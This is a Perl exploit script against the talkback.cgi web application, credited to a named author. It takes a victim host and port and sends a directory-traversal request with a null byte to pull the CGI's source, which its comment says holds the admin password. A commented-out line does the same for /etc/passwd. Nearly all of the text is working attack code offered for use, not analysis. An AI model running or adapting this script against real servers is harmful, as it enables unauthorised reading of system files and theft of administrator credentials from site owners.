#!/usr/bin/perl
# The script fails to check for '../' sequences and null bytes
# in the HTML variable
#
# -dkl- by NeMeS||y - dragon@shellnow.it

use LWP::UserAgent;
use Getopt::Std;

sub usage() {
   print "\n-dkl-                                -dkl-\n\n";
   print "Usage: ".$0." -v <host> [port]\n\n";
   print "default port : 80\n\n";
   exit 1;
}

getopts('v:h', \%opt)||die("Problems... damn!!\n");
if(defined($opt{'h'}))
  { \&usage() }
if(defined($opt{'v'}))
 { $victim=$opt{'v'} }
   else
    { \&usage() }

if ($ARGV[0] eq '')
  { $port = 80; }
 else { $port = $ARGV[0]; };

#to display the contents of the /etc/passwd
#$string  = "/cgi/bin/talkback.cgi?article=../../../../etc/passwd%00&action=&view&matchview=1";

#the source of talkback.cgi, which includes admin password information.
$string = "/cgi/bin/talkback.cgi?article=../cgi-bin/talkback.cgi?%00&action=view&matchview=1";

print "\nTalkBack.cgi exploit Coded by NeMeS||y\n\n";
print "Victim :: ".$victim."\n";
print "Port   :: ".$port."\n\n";

$exp_string = "http://".$victim.$string;
$hdrs = new HTTP::Headers(Accept => 'text/plain', User-Agent => 'NeMBrowser/1.0');
$url  = new URI::URL($exp_string);
$req  = new HTTP::Request(GET, $url, $hdrs);
$ua   = new LWP::UserAgent;
$resp = $ua->request($req);
 if ($resp->is_success)
   {
     print "Message :\n".$resp->content; }
  else
   {
     print "Message :\n".$resp->message; }

print "\n\nE0F by NeMeS||y \n\n";

#dedicated to Annalisa